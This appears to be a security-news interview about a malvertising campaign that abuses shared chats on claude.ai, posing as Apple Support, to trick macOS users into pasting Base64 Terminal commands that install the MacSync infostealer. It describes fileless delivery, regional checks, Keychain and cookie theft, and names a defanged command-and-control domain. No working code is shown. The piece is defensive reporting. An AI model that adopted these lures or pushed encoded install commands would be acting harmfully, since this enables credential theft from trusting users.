Rupert Marais is a leading in-house security specialist with deep expertise in endpoint protection, device security, and the evolving landscape of macOS threats. With years of experience managing complex network infrastructures and developing cybersecurity strategies, he has become a pivotal voice in identifying how modern attackers exploit the intersection of human trust and legitimate web services. In this discussion, we explore the alarming rise of malvertising campaigns that weaponize official AI platforms to deliver sophisticated infostealers to unsuspecting users.
The conversation covers the mechanics of how attackers use legitimate domains to mask malicious intents and the technical hurdles of detecting polymorphic, memory-resident malware. We also examine the specific methods used to harvest sensitive credentials from macOS systems and the vital steps organizations must take to protect their employees from command-line exploitation.
Search results often display legitimate URLs that lead directly to official AI platforms, yet these specific pages can host malicious instructions. How do attackers exploit the trust associated with verified domains, and what social engineering tactics are most effective in tricking users into executing Terminal commands?
This campaign represents a clever evolution in malvertising because it removes the “red flag” of a fake domain. By using Google Ads that point to the actual claude.ai domain, attackers bypass the skepticism users usually have for suspicious URLs. Once the user is on the legitimate site, the attackers leverage the “shared chat” feature to present a polished, authoritative-looking guide. They even go as far as masquerading as “Apple Support” within the chat to create a false sense of security and urgency. This environment makes it much easier to convince a user to copy and paste a Base64-encoded string into their Terminal, as they believe they are following a verified installation procedure for the “Claude Code” tool.
Modern macOS threats frequently utilize polymorphic delivery and memory-resident scripts to bypass traditional signature-based security tools. What are the technical challenges in detecting these “fileless” attacks, and why do some campaigns include checks for specific keyboard layouts or regional settings before deploying the final payload?
The primary challenge is that these scripts, such as the Gunzip-compressed shell instructions we’ve observed, run entirely in memory without dropping a traditional binary file that an antivirus could scan on the disk. By using polymorphic delivery, the server sends a uniquely obfuscated version of the payload for every single request, which means there is no consistent “file hash” for security tools to flag. The regional checks, specifically looking for Russian or CIS-region keyboard layouts, serve as a defensive filter for the attackers. If these layouts are detected, the script sends a “cis_blocked” status and terminates, likely to avoid drawing the attention of law enforcement in those specific jurisdictions or to ensure they are only hitting high-value Western targets.
When an infostealer successfully compromises a system, it often targets browser cookies and the local Keychain. Could you walk us through the process by which attackers package and exfiltrate this sensitive data, and what are the long-term security implications for users whose encrypted credentials are harvested?
Once the second-stage payload is executed via macOS’s built-in osascript engine, it gains the ability to reach into protected areas of the system. The malware, identified in some cases as the MacSync infostealer, systematically harvests browser credentials, session cookies, and the contents of the macOS Keychain. This data is bundled into a package and exfiltrated to a command-and-control server, such as the briskinternet[.]com domain used in recent attacks. The long-term implications are devastating because even if a user changes their password, stolen session cookies can allow attackers to bypass Multi-Factor Authentication (MFA) and maintain access to accounts until those specific sessions are manually revoked.
Many users rely on search engines to find software installation guides, which increases the risk of encountering weaponized content on legitimate hosting platforms. What standard operating procedures should individuals follow when using command-line interfaces, and how can organizations better educate employees to distinguish between official documentation and malicious shared chats?
Individuals must adopt a “zero-trust” approach to the command line; you should never paste a command into Terminal unless you have manually verified the source and understand exactly what the string is doing, especially if it is encoded in Base64. Organizations need to emphasize that official tools like the Claude Code CLI are hosted in formal documentation or via package managers like Homebrew, not within a chat window. We need to teach employees that legitimate companies will never ask you to run a script provided by an AI chatbot to install their software. It is also critical to encourage users to navigate directly to official websites by typing the URL themselves rather than clicking on “Sponsored” results, which have become a primary vector for these 2-stage delivery attacks.
What is your forecast for the evolution of malvertising and the abuse of shared AI features?
I expect we will see a significant increase in the “living off the land” approach where attackers stop building their own phishing sites entirely and instead host 100% of their malicious content on trusted platforms like Anthropic, OpenAI, or GitHub. As AI tools become more integrated into professional workflows, attackers will likely move toward more targeted “spear-malvertising,” where they bid on very specific technical keywords to catch developers and system administrators. We are entering an era where the URL is no longer a reliable indicator of safety, shifting the burden of security away from automated filters and back onto the split-second judgment of the user.
